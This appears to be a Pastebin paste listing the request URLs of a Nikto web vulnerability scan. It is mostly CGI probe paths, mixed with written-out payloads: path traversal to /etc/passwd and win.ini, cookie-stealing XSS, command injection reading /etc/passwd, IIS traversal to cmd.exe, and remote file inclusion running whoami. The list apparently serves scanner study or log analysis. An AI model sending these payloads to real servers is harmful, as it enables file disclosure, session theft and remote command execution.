Advertisement
Neonprimetime

Nikto Vulnerability Scan Urls

Aug 16th, 2016
194
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.81 KB | None | 0 0
  1. Nikto Vulnerability Scan Urls
  2. ***********
  3. ../../../../../../../../../../../../windows/win.ini
  4. ../../../../../../../../../../../../winnt/win.ini
  5. ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
  6. ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../
  7. /
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  9. /%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  10. /%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin%2eini
  11. /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
  12. /.%252e/.%252e/.%252e/.%252e/windows/win.ini
  13. /.%252e/.%252e/.%252e/.%252e/winnt/win.ini
  14. /.%252e/.%252e/.%252e/winnt/boot.ini
  15. /../../../../../../../../../../../../windows/win.ini
  16. /../../../../../../../../../../../../winnt/win.ini
  17. /../webserver.ini
  18. /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
  19. /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
  20. /..\\pixfir~1\\how_to_login.html
  21. /./
  22. /././..
  23. ////../../data/config/microsrv.cfg
  24. /_mem_bin/formslogin.asp?\\"><script>alert('Vulnerable')</script>
  25. /_mt/mt.cgi
  26. /_vti_bin/shtml.exe
  27. /~/<script>alert('Vulnerable')</script>.asp
  28. /~/<script>alert('Vulnerable')</script>.aspx
  29. /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
  30. /~root/
  31. /<script>alert('Vulnerable')</script>.shtm
  32. /<script>alert('Vulnerable')</script>.stm
  33. /3rdparty/phpMyAdmin/server_sync.php?c=phpinfo()
  34. /666%0a%0a<script>alert('Vulnerable');</script>666.jsp
  35. /a%5c.aspx
  36. /addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
  37. /admentor/adminadmin.asp
  38. /admin.cgi
  39. /admin/browse.asp?FilePath=c:\\&Opt=2&level=0
  40. /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\"><script>alert(document.cookie)</script>
  41. /administrator.cgi
  42. /administrator/gallery/gallery.php?directory=\\"<script>alert(document.cookie)</script>
  43. /administrator/gallery/navigation.php?directory=\\"<script>alert(document.cookie)</script>
  44. /administrator/gallery/uploadimage.php?directory=\\"<script>alert(document.cookie)</script>
  45. /administrator/gallery/view.php?path=\\"<script>alert(document.cookie)</script>
  46. /administrator/popups/sectionswindow.php?type=web&link=\\"<script>alert(document.cookie)</script>
  47. /administrator/upload.php?newbanner=1&choice=\\"<script>alert(document.cookie)</script>
  48. /article.cfm?id=1'<script>alert(document.cookie);</script>
  49. /author.asp
  50. /bigconf.cgi
  51. /billing/billing.apw
  52. /bin/architext_query.pl
  53. /bin/banner.cgi
  54. /bin/bannereditor.cgi
  55. /bin/bb-ack.sh
  56. /bin/bb-histlog.sh
  57. /bin/bb-rep.sh
  58. /bin/bb-replog.sh
  59. /bin/bbs_forum.cgi
  60. /bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  61. /bin/csPassword.cgi
  62. /bin/csPassword/csPassword.cgi
  63. /bin/cutecast/members/
  64. /bin/day5datanotifier.cgi
  65. /bin/db2www/library/document.d2w/show
  66. /bin/logs/error_log
  67. /bin/lookwho.cgi
  68. /bin/maillist.cgi
  69. /bin/maillist.pl
  70. /bin/man.sh
  71. /bin/responder.cgi
  72. /bin/rguest.exe
  73. /bin/rksh
  74. /bin/rsh
  75. /bin/search.cgi
  76. /bin/tablebuild.pl
  77. /bin/tcsh
  78. /bin/test.cgi
  79. /bin/test/test.cgi
  80. /bin/textcounter.pl
  81. /bin/webwho.pl
  82. /bin/wguest.exe
  83. /bin/wwwboard.cgi.cgi
  84. /bin/wwwboard.pl
  85. /bin/www-sql
  86. /blah_badfile.shtml
  87. /blah-whatever-badfile.jsp
  88. /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini
  89. /ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/\\\\etc/\\\\passwd
  90. /ca//\\\\../\\\\../\\\\../\\\\../\\\\../\\\\../\\\\windows/\\\\win.ini
  91. /catinfo?<u><b>TESTING
  92. /certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
  93. /certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
  94. /cfappman/index.cfm
  95. /cfdocs/examples/cvbeans/beaninfo.cfm
  96. /cfdocs/examples/parks/detail.cfm
  97. /cfdocs/expeval/openfile.cfm
  98. /cfide/administrator/index.cfm
  99. /CFIDE/administrator/settings/version.cfm
  100. /cfide/Administrator/startstop.html
  101. /CFIDE/componentutils/cfcexplorer.cfc
  102. /cgi.cgi/architext_query.pl
  103. /cgi.cgi/bannereditor.cgi
  104. /cgi.cgi/bb-histlog.sh
  105. /cgi.cgi/bb-rep.sh
  106. /cgi.cgi/bb-replog.sh
  107. /cgi.cgi/bbs_forum.cgi
  108. /cgi.cgi/bizdb1-search.cgi
  109. /cgi.cgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  110. /cgi.cgi/csPassword/csPassword.cgi
  111. /cgi.cgi/cutecast/members/
  112. /cgi.cgi/day5datanotifier.cgi
  113. /cgi.cgi/db2www/library/document.d2w/show
  114. /cgi.cgi/lookwho.cgi
  115. /cgi.cgi/maillist.cgi
  116. /cgi.cgi/maillist.pl
  117. /cgi.cgi/man.sh
  118. /cgi.cgi/rguest.exe
  119. /cgi.cgi/rksh
  120. /cgi.cgi/rsh
  121. /cgi.cgi/scripts/slxweb.dll/getfile?type=Library&file=[invalid
  122. /cgi.cgi/search.cgi
  123. /cgi.cgi/sensepost.exe?/c+dir
  124. /cgi.cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  125. /cgi.cgi/tcsh
  126. /cgi.cgi/test.cgi
  127. /cgi.cgi/test/test.cgi
  128. /cgi.cgi/textcounter.pl
  129. /cgi.cgi/wguest.exe
  130. /cgi.cgi/ws_ftp.ini
  131. /cgi.cgi/wwwboard.cgi.cgi
  132. /cgi.cgi/wwwboard.pl
  133. /cgi.cgi/www-sql
  134. /cgi/architext_query.pl
  135. /cgi/banner.cgi
  136. /cgi/bannereditor.cgi
  137. /cgi/bb-ack.sh
  138. /cgi/bb-histlog.sh
  139. /cgi/bb-rep.sh
  140. /cgi/bb-replog.sh
  141. /cgi/bbs_forum.cgi
  142. /cgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  143. /cgi/csPassword.cgi
  144. /cgi/csPassword/csPassword.cgi
  145. /cgi/cutecast/members/
  146. /cgi/day5datanotifier.cgi
  147. /cgi/db2www/library/document.d2w/show
  148. /cgi/logs/error_log
  149. /cgi/lookwho.cgi
  150. /cgi/maillist.cgi
  151. /cgi/maillist.pl
  152. /cgi/man.sh
  153. /cgi/responder.cgi
  154. /cgi/rguest.exe
  155. /cgi/rksh
  156. /cgi/rsh
  157. /cgi/search.cgi
  158. /cgi/tablebuild.pl
  159. /cgi/tcsh
  160. /cgi/test.cgi
  161. /cgi/test/test.cgi
  162. /cgi/textcounter.pl
  163. /cgi/webwho.pl
  164. /cgi/wguest.exe
  165. /cgi/wwwboard.cgi.cgi
  166. /cgi/wwwboard.pl
  167. /cgi/www-sql
  168. /cgi-914/architext_query.pl
  169. /cgi-914/bannereditor.cgi
  170. /cgi-914/bb-ack.sh
  171. /cgi-914/bb-histlog.sh
  172. /cgi-914/bb-rep.sh
  173. /cgi-914/bb-replog.sh
  174. /cgi-914/bbs_forum.cgi
  175. /cgi-914/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  176. /cgi-914/csPassword/csPassword.cgi
  177. /cgi-914/cutecast/members/
  178. /cgi-914/day5datanotifier.cgi
  179. /cgi-914/db2www/library/document.d2w/show
  180. /cgi-914/logs/error_log
  181. /cgi-914/lookwho.cgi
  182. /cgi-914/maillist.cgi
  183. /cgi-914/maillist.pl
  184. /cgi-914/man.sh
  185. /cgi-914/responder.cgi
  186. /cgi-914/rguest.exe
  187. /cgi-914/rksh
  188. /cgi-914/rsh
  189. /cgi-914/search.cgi
  190. /cgi-914/tablebuild.pl
  191. /cgi-914/tcsh
  192. /cgi-914/test.cgi
  193. /cgi-914/test/test.cgi
  194. /cgi-914/textcounter.pl
  195. /cgi-914/webwho.pl
  196. /cgi-914/wguest.exe
  197. /cgi-914/wwwboard.cgi.cgi
  198. /cgi-914/wwwboard.pl
  199. /cgi-914/www-sql
  200. /cgi-915/architext_query.pl
  201. /cgi-915/banner.cgi
  202. /cgi-915/bannereditor.cgi
  203. /cgi-915/bb-ack.sh
  204. /cgi-915/bb-histlog.sh
  205. /cgi-915/bb-rep.sh
  206. /cgi-915/bb-replog.sh
  207. /cgi-915/bbs_forum.cgi
  208. /cgi-915/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  209. /cgi-915/csPassword.cgi
  210. /cgi-915/csPassword/csPassword.cgi
  211. /cgi-915/cutecast/members/
  212. /cgi-915/day5datanotifier.cgi
  213. /cgi-915/db2www/library/document.d2w/show
  214. /cgi-915/logs/error_log
  215. /cgi-915/lookwho.cgi
  216. /cgi-915/maillist.cgi
  217. /cgi-915/maillist.pl
  218. /cgi-915/man.sh
  219. /cgi-915/responder.cgi
  220. /cgi-915/rguest.exe
  221. /cgi-915/rksh
  222. /cgi-915/rsh
  223. /cgi-915/search.cgi
  224. /cgi-915/tablebuild.pl
  225. /cgi-915/tcsh
  226. /cgi-915/test.cgi
  227. /cgi-915/test/test.cgi
  228. /cgi-915/textcounter.pl
  229. /cgi-915/webwho.pl
  230. /cgi-915/wguest.exe
  231. /cgi-915/wwwboard.cgi.cgi
  232. /cgi-915/wwwboard.pl
  233. /cgi-915/www-sql
  234. /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
  235. /cgi-bin/admin.cgi
  236. /cgibin/architext_query.pl
  237. /cgi-bin/architext_query.pl
  238. /cgibin/banner.cgi
  239. /cgi-bin/banner.cgi
  240. /cgibin/bannereditor.cgi
  241. /cgi-bin/bannereditor.cgi
  242. /cgibin/bb-ack.sh
  243. /cgi-bin/bb-ack.sh
  244. /cgibin/bb-histlog.sh
  245. /cgi-bin/bb-histlog.sh
  246. /cgibin/bb-rep.sh
  247. /cgi-bin/bb-rep.sh
  248. /cgibin/bb-replog.sh
  249. /cgi-bin/bb-replog.sh
  250. /cgibin/bbs_forum.cgi
  251. /cgi-bin/bbs_forum.cgi
  252. /cgibin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  253. /cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  254. /cgi-bin/bugreport.cgi
  255. /cgibin/csPassword.cgi
  256. /cgi-bin/csPassword.cgi
  257. /cgibin/csPassword/csPassword.cgi
  258. /cgi-bin/csPassword/csPassword.cgi
  259. /cgibin/cutecast/members/
  260. /cgi-bin/cutecast/members/
  261. /cgibin/day5datanotifier.cgi
  262. /cgi-bin/day5datanotifier.cgi
  263. /cgibin/db2www/library/document.d2w/show
  264. /cgi-bin/db2www/library/document.d2w/show
  265. /cgi-bin/FormHandler.cgi
  266. /cgibin/logs/error_log
  267. /cgi-bin/logs/error_log
  268. /cgibin/lookwho.cgi
  269. /cgi-bin/lookwho.cgi
  270. /cgibin/maillist.cgi
  271. /cgi-bin/maillist.cgi
  272. /cgibin/maillist.pl
  273. /cgi-bin/maillist.pl
  274. /cgibin/man.sh
  275. /cgi-bin/man.sh
  276. /cgibin/php5
  277. /cgibin/responder.cgi
  278. /cgi-bin/responder.cgi
  279. /cgibin/rguest.exe
  280. /cgi-bin/rguest.exe
  281. /cgibin/rksh
  282. /cgi-bin/rksh
  283. /cgibin/rsh
  284. /cgi-bin/rsh
  285. /cgibin/search.cgi
  286. /cgi-bin/search.cgi
  287. /cgibin/tablebuild.pl
  288. /cgi-bin/tablebuild.pl
  289. /cgibin/tcsh
  290. /cgi-bin/tcsh
  291. /cgibin/test.cgi
  292. /cgi-bin/test.cgi
  293. /cgibin/test/test.cgi
  294. /cgi-bin/test/test.cgi
  295. /cgibin/textcounter.pl
  296. /cgi-bin/textcounter.pl
  297. /cgibin/webwho.pl
  298. /cgi-bin/webwho.pl
  299. /cgibin/wguest.exe
  300. /cgi-bin/wguest.exe
  301. /cgi-bin/wrap
  302. /cgibin/wwwboard.cgi.cgi
  303. /cgi-bin/wwwboard.cgi.cgi
  304. /cgibin/wwwboard.pl
  305. /cgi-bin/wwwboard.pl
  306. /cgibin/www-sql
  307. /cgi-bin/www-sql
  308. /cgi-bin-sdb/architext_query.pl
  309. /cgi-bin-sdb/banner.cgi
  310. /cgi-bin-sdb/bannereditor.cgi
  311. /cgi-bin-sdb/bb-ack.sh
  312. /cgi-bin-sdb/bb-histlog.sh
  313. /cgi-bin-sdb/bb-rep.sh
  314. /cgi-bin-sdb/bb-replog.sh
  315. /cgi-bin-sdb/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  316. /cgi-bin-sdb/csPassword.cgi
  317. /cgi-bin-sdb/csPassword/csPassword.cgi
  318. /cgi-bin-sdb/cutecast/members/
  319. /cgi-bin-sdb/day5datanotifier.cgi
  320. /cgi-bin-sdb/logs/error_log
  321. /cgi-bin-sdb/lookwho.cgi
  322. /cgi-bin-sdb/maillist.cgi
  323. /cgi-bin-sdb/maillist.pl
  324. /cgi-bin-sdb/responder.cgi
  325. /cgi-bin-sdb/rguest.exe
  326. /cgi-bin-sdb/rksh
  327. /cgi-bin-sdb/rsh
  328. /cgi-bin-sdb/tablebuild.pl
  329. /cgi-bin-sdb/tcsh
  330. /cgi-bin-sdb/test.cgi
  331. /cgi-bin-sdb/test/test.cgi
  332. /cgi-bin-sdb/webwho.pl
  333. /cgi-bin-sdb/wguest.exe
  334. /cgi-bin-sdb/wwwboard.cgi.cgi
  335. /cgi-bin-sdb/www-sql
  336. /cgi-exe/architext_query.pl
  337. /cgi-exe/banner.cgi
  338. /cgi-exe/bannereditor.cgi
  339. /cgi-exe/bb-ack.sh
  340. /cgi-exe/bb-histlog.sh
  341. /cgi-exe/bb-rep.sh
  342. /cgi-exe/bb-replog.sh
  343. /cgi-exe/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  344. /cgi-exe/cgiinfo.cgi
  345. /cgi-exe/csPassword.cgi
  346. /cgi-exe/csPassword/csPassword.cgi
  347. /cgi-exe/cutecast/members/
  348. /cgi-exe/day5datanotifier.cgi
  349. /cgi-exe/formmail.cgi
  350. /cgi-exe/logs/error_log
  351. /cgi-exe/lookwho.cgi
  352. /cgi-exe/maillist.cgi
  353. /cgi-exe/maillist.pl
  354. /cgi-exe/responder.cgi
  355. /cgi-exe/restore_config.cgi
  356. /cgi-exe/rguest.exe
  357. /cgi-exe/rksh
  358. /cgi-exe/rsh
  359. /cgi-exe/search.cgi
  360. /cgi-exe/tablebuild.pl
  361. /cgi-exe/tcsh
  362. /cgi-exe/test.cgi
  363. /cgi-exe/test/test.cgi
  364. /cgi-exe/textcounter.pl
  365. /cgi-exe/webwho.pl
  366. /cgi-exe/wguest.exe
  367. /cgi-exe/wwwboard.cgi.cgi
  368. /cgi-exe/wwwboard.pl
  369. /cgi-exe/www-sql
  370. /cgi-home/architext_query.pl
  371. /cgi-home/banner.cgi
  372. /cgi-home/bannereditor.cgi
  373. /cgi-home/bb-ack.sh
  374. /cgi-home/bb-histlog.sh
  375. /cgi-home/bb-rep.sh
  376. /cgi-home/bb-replog.sh
  377. /cgi-home/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  378. /cgi-home/csPassword.cgi
  379. /cgi-home/csPassword/csPassword.cgi
  380. /cgi-home/cutecast/members/
  381. /cgi-home/day5datanotifier.cgi
  382. /cgi-home/logs/error_log
  383. /cgi-home/lookwho.cgi
  384. /cgi-home/maillist.cgi
  385. /cgi-home/maillist.pl
  386. /cgi-home/responder.cgi
  387. /cgi-home/rguest.exe
  388. /cgi-home/rksh
  389. /cgi-home/rsh
  390. /cgi-home/search.cgi
  391. /cgi-home/tablebuild.pl
  392. /cgi-home/tcsh
  393. /cgi-home/test.cgi
  394. /cgi-home/test/test.cgi
  395. /cgi-home/textcounter.pl
  396. /cgi-home/webwho.pl
  397. /cgi-home/wguest.exe
  398. /cgi-home/wwwboard.cgi.cgi
  399. /cgi-home/www-sql
  400. /cgi-local/architext_query.pl
  401. /cgi-local/banner.cgi
  402. /cgi-local/bannereditor.cgi
  403. /cgi-local/bb-ack.sh
  404. /cgi-local/bb-histlog.sh
  405. /cgi-local/bb-rep.sh
  406. /cgi-local/bb-replog.sh
  407. /cgi-local/bbs_forum.cgi
  408. /cgi-local/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  409. /cgi-local/csPassword.cgi
  410. /cgi-local/csPassword/csPassword.cgi
  411. /cgi-local/cutecast/members/
  412. /cgi-local/day5datanotifier.cgi
  413. /cgi-local/db2www/library/document.d2w/show
  414. /cgi-local/logs/error_log
  415. /cgi-local/lookwho.cgi
  416. /cgi-local/maillist.cgi
  417. /cgi-local/maillist.pl
  418. /cgi-local/man.sh
  419. /cgi-local/responder.cgi
  420. /cgi-local/rguest.exe
  421. /cgi-local/rksh
  422. /cgi-local/rsh
  423. /cgi-local/search.cgi
  424. /cgi-local/tablebuild.pl
  425. /cgi-local/tcsh
  426. /cgi-local/test.cgi
  427. /cgi-local/test/test.cgi
  428. /cgi-local/textcounter.pl
  429. /cgi-local/webwho.pl
  430. /cgi-local/wguest.exe
  431. /cgi-local/wwwboard.cgi.cgi
  432. /cgi-local/wwwboard.pl
  433. /cgi-local/www-sql
  434. /cgi-mod/architext_query.pl
  435. /cgi-mod/banner.cgi
  436. /cgi-mod/bannereditor.cgi
  437. /cgi-mod/bb-ack.sh
  438. /cgi-mod/bb-histlog.sh
  439. /cgi-mod/bb-rep.sh
  440. /cgi-mod/bb-replog.sh
  441. /cgi-mod/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  442. /cgi-mod/csPassword.cgi
  443. /cgi-mod/csPassword/csPassword.cgi
  444. /cgi-mod/cutecast/members/
  445. /cgi-mod/day5datanotifier.cgi
  446. /cgi-mod/logs/error_log
  447. /cgi-mod/lookwho.cgi
  448. /cgi-mod/maillist.cgi
  449. /cgi-mod/maillist.pl
  450. /cgi-mod/responder.cgi
  451. /cgi-mod/rguest.exe
  452. /cgi-mod/rksh
  453. /cgi-mod/rsh
  454. /cgi-mod/server.php
  455. /cgi-mod/tablebuild.pl
  456. /cgi-mod/tcsh
  457. /cgi-mod/test.cgi
  458. /cgi-mod/test/test.cgi
  459. /cgi-mod/webwho.pl
  460. /cgi-mod/wguest.exe
  461. /cgi-mod/wwwboard.cgi.cgi
  462. /cgi-mod/www-sql
  463. /cgi-perl/architext_query.pl
  464. /cgi-perl/banner.cgi
  465. /cgi-perl/bannereditor.cgi
  466. /cgi-perl/bb-ack.sh
  467. /cgi-perl/bb-histlog.sh
  468. /cgi-perl/bb-rep.sh
  469. /cgi-perl/bb-replog.sh
  470. /cgi-perl/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  471. /cgi-perl/csPassword.cgi
  472. /cgi-perl/csPassword/csPassword.cgi
  473. /cgi-perl/cutecast/members/
  474. /cgi-perl/day5datanotifier.cgi
  475. /cgi-perl/logs/error_log
  476. /cgi-perl/lookwho.cgi
  477. /cgi-perl/maillist.cgi
  478. /cgi-perl/maillist.pl
  479. /cgi-perl/responder.cgi
  480. /cgi-perl/rguest.exe
  481. /cgi-perl/rksh
  482. /cgi-perl/rsh
  483. /cgi-perl/search.cgi
  484. /cgi-perl/tablebuild.pl
  485. /cgi-perl/tcsh
  486. /cgi-perl/test.cgi
  487. /cgi-perl/test/test.cgi
  488. /cgi-perl/webwho.pl
  489. /cgi-perl/wguest.exe
  490. /cgi-perl/wwwboard.cgi.cgi
  491. /cgi-perl/www-sql
  492. /cgis/architext_query.pl
  493. /cgis/banner.cgi
  494. /cgis/bannereditor.cgi
  495. /cgis/bb-ack.sh
  496. /cgis/bb-histlog.sh
  497. /cgis/bb-rep.sh
  498. /cgis/bb-replog.sh
  499. /cgis/bbs_forum.cgi
  500. /cgis/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  501. /cgis/csPassword.cgi
  502. /cgis/csPassword/csPassword.cgi
  503. /cgis/cutecast/members/
  504. /cgis/day5datanotifier.cgi
  505. /cgis/logs/error_log
  506. /cgis/lookwho.cgi
  507. /cgis/maillist.cgi
  508. /cgis/maillist.pl
  509. /cgis/man.sh
  510. /cgis/responder.cgi
  511. /cgis/rguest.exe
  512. /cgis/rksh
  513. /cgis/rsh
  514. /cgis/search.cgi
  515. /cgis/tablebuild.pl
  516. /cgis/tcsh
  517. /cgis/test.cgi
  518. /cgis/test/test.cgi
  519. /cgis/textcounter.pl
  520. /cgis/webwho.pl
  521. /cgis/wguest.exe
  522. /cgis/wwwboard.cgi.cgi
  523. /cgis/wwwboard.pl
  524. /cgis/www-sql
  525. /cgi-sys/architext_query.pl
  526. /cgi-sys/banner.cgi
  527. /cgi-sys/bannereditor.cgi
  528. /cgi-sys/bb-ack.sh
  529. /cgi-sys/bb-histlog.sh
  530. /cgi-sys/bb-rep.sh
  531. /cgi-sys/bb-replog.sh
  532. /cgi-sys/bbs_forum.cgi
  533. /cgi-sys/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  534. /cgi-sys/csPassword.cgi
  535. /cgi-sys/csPassword/csPassword.cgi
  536. /cgi-sys/cutecast/members/
  537. /cgi-sys/day5datanotifier.cgi
  538. /cgi-sys/db2www/library/document.d2w/show
  539. /cgi-sys/logs/error_log
  540. /cgi-sys/lookwho.cgi
  541. /cgi-sys/maillist.cgi
  542. /cgi-sys/maillist.pl
  543. /cgi-sys/man.sh
  544. /cgi-sys/responder.cgi
  545. /cgi-sys/rguest.exe
  546. /cgi-sys/rksh
  547. /cgi-sys/rsh
  548. /cgi-sys/search.cgi
  549. /cgi-sys/tablebuild.pl
  550. /cgi-sys/tcsh
  551. /cgi-sys/test.cgi
  552. /cgi-sys/test/test.cgi
  553. /cgi-sys/textcounter.pl
  554. /cgi-sys/webwho.pl
  555. /cgi-sys/wguest.exe
  556. /cgi-sys/wwwboard.cgi.cgi
  557. /cgi-sys/wwwboard.pl
  558. /cgi-sys/www-sql
  559. /cgi-win/architext_query.pl
  560. /cgi-win/banner.cgi
  561. /cgi-win/bannereditor.cgi
  562. /cgi-win/bb-ack.sh
  563. /cgi-win/bb-histlog.sh
  564. /cgi-win/bb-rep.sh
  565. /cgi-win/bb-replog.sh
  566. /cgi-win/bbs_forum.cgi
  567. /cgi-win/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  568. /cgi-win/csPassword.cgi
  569. /cgi-win/csPassword/csPassword.cgi
  570. /cgi-win/cutecast/members/
  571. /cgi-win/day5datanotifier.cgi
  572. /cgi-win/logs/error_log
  573. /cgi-win/lookwho.cgi
  574. /cgi-win/maillist.cgi
  575. /cgi-win/maillist.pl
  576. /cgi-win/man.sh
  577. /cgi-win/responder.cgi
  578. /cgi-win/rguest.exe
  579. /cgi-win/rksh
  580. /cgi-win/rsh
  581. /cgi-win/search.cgi
  582. /cgi-win/tablebuild.pl
  583. /cgi-win/tcsh
  584. /cgi-win/test.cgi
  585. /cgi-win/test/test.cgi
  586. /cgi-win/textcounter.pl
  587. /cgi-win/webwho.pl
  588. /cgi-win/wguest.exe
  589. /cgi-win/wwwboard.cgi.cgi
  590. /cgi-win/wwwboard.pl
  591. /cgi-win/www-sql
  592. /clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
  593. /ConsoleHelp/default.jsp
  594. /courier/intermediate_login.html
  595. /ea-gBook/index_inc.php?inc_ordner=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
  596. /emailfriend/emailarticle.php?id=\\"<script>alert(document.cookie)</script>
  597. /emailfriend/emailfaq.php?id=\\"<script>alert(document.cookie)</script>
  598. /emailfriend/emailnews.php?id=\\"<script>alert(document.cookie)</script>
  599. /examples/cookie
  600. /examples/session
  601. /fcgi-bin/architext_query.pl
  602. /fcgi-bin/banner.cgi
  603. /fcgi-bin/bannereditor.cgi
  604. /fcgi-bin/bb-ack.sh
  605. /fcgi-bin/bb-histlog.sh
  606. /fcgi-bin/bb-rep.sh
  607. /fcgi-bin/bb-replog.sh
  608. /fcgi-bin/bbs_forum.cgi
  609. /fcgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  610. /fcgi-bin/csPassword.cgi
  611. /fcgi-bin/csPassword/csPassword.cgi
  612. /fcgi-bin/cutecast/members/
  613. /fcgi-bin/day5datanotifier.cgi
  614. /fcgi-bin/logs/error_log
  615. /fcgi-bin/lookwho.cgi
  616. /fcgi-bin/maillist.cgi
  617. /fcgi-bin/maillist.pl
  618. /fcgi-bin/man.sh
  619. /fcgi-bin/responder.cgi
  620. /fcgi-bin/rguest.exe
  621. /fcgi-bin/rksh
  622. /fcgi-bin/rsh
  623. /fcgi-bin/search.cgi
  624. /fcgi-bin/tablebuild.pl
  625. /fcgi-bin/tcsh
  626. /fcgi-bin/test.cgi
  627. /fcgi-bin/test/test.cgi
  628. /fcgi-bin/textcounter.pl
  629. /fcgi-bin/webwho.pl
  630. /fcgi-bin/wguest.exe
  631. /fcgi-bin/wwwboard.cgi.cgi
  632. /fcgi-bin/wwwboard.pl
  633. /fcgi-bin/www-sql
  634. /file/../../../../../../../../etc/
  635. /filemanager/filemanager_forms.php?lib_path=http://cirt.net/rfiinc.txt?
  636. /forum/My_eGallery/public/displayCategory.php
  637. /forumdisplay.php?GLOBALS[]=1&f=2&comma=\\".system('id').\\"
  638. /forums//adm/config.php
  639. /forums//admin/config.php
  640. /forums//administrator/config.php
  641. /forums/config.php
  642. /ganglia/
  643. /gb/index.php?login=true
  644. /geeklog/users.php
  645. /getaccess
  646. /global.inc
  647. /guestbook/admin.php
  648. /guestbook/guestbook.html
  649. /guestbook/guestbookdat
  650. /guestbook/pwd
  651. /help.html
  652. /help/
  653. /hola/admin/cms/htmltags.php?datei=./sec/data.php
  654. /horde/imp/test.php
  655. /horde/test.php
  656. /horde/test.php?mode=phpinfo
  657. /htbin/architext_query.pl
  658. /htbin/banner.cgi
  659. /htbin/bannereditor.cgi
  660. /htbin/bb-ack.sh
  661. /htbin/bb-histlog.sh
  662. /htbin/bb-rep.sh
  663. /htbin/bb-replog.sh
  664. /htbin/bbs_forum.cgi
  665. /htbin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  666. /htbin/csPassword.cgi
  667. /htbin/csPassword/csPassword.cgi
  668. /htbin/cutecast/members/
  669. /htbin/day5datanotifier.cgi
  670. /htbin/db2www/library/document.d2w/show
  671. /htbin/logs/error_log
  672. /htbin/lookwho.cgi
  673. /htbin/maillist.cgi
  674. /htbin/maillist.pl
  675. /htbin/man.sh
  676. /htbin/responder.cgi
  677. /htbin/rguest.exe
  678. /htbin/rksh
  679. /htbin/rsh
  680. /htbin/search.cgi
  681. /htbin/tablebuild.pl
  682. /htbin/tcsh
  683. /htbin/test.cgi
  684. /htbin/test.cgi.php
  685. /htbin/test/test.cgi
  686. /htbin/textcounter.pl
  687. /htbin/webwho.pl
  688. /htbin/wguest.exe
  689. /htbin/wwwboard.cgi.cgi
  690. /htbin/wwwboard.pl
  691. /htbin/www-sql
  692. /html/cgi-bin/cgicso?query=AAA
  693. /https-admserv/bin/index?/<script>alert(document.cookie)</script>
  694. /imp/horde/test.php
  695. /imp/horde/test.php?mode=phpinfo
  696. /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
  697. /inc/common.load.php
  698. /inc/config.php
  699. /inc/dbase.php
  700. /index.html.bak
  701. /index.html~
  702. /index.php/123
  703. /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
  704. /index.php?dir=<script>alert('Vulnerable')</script>
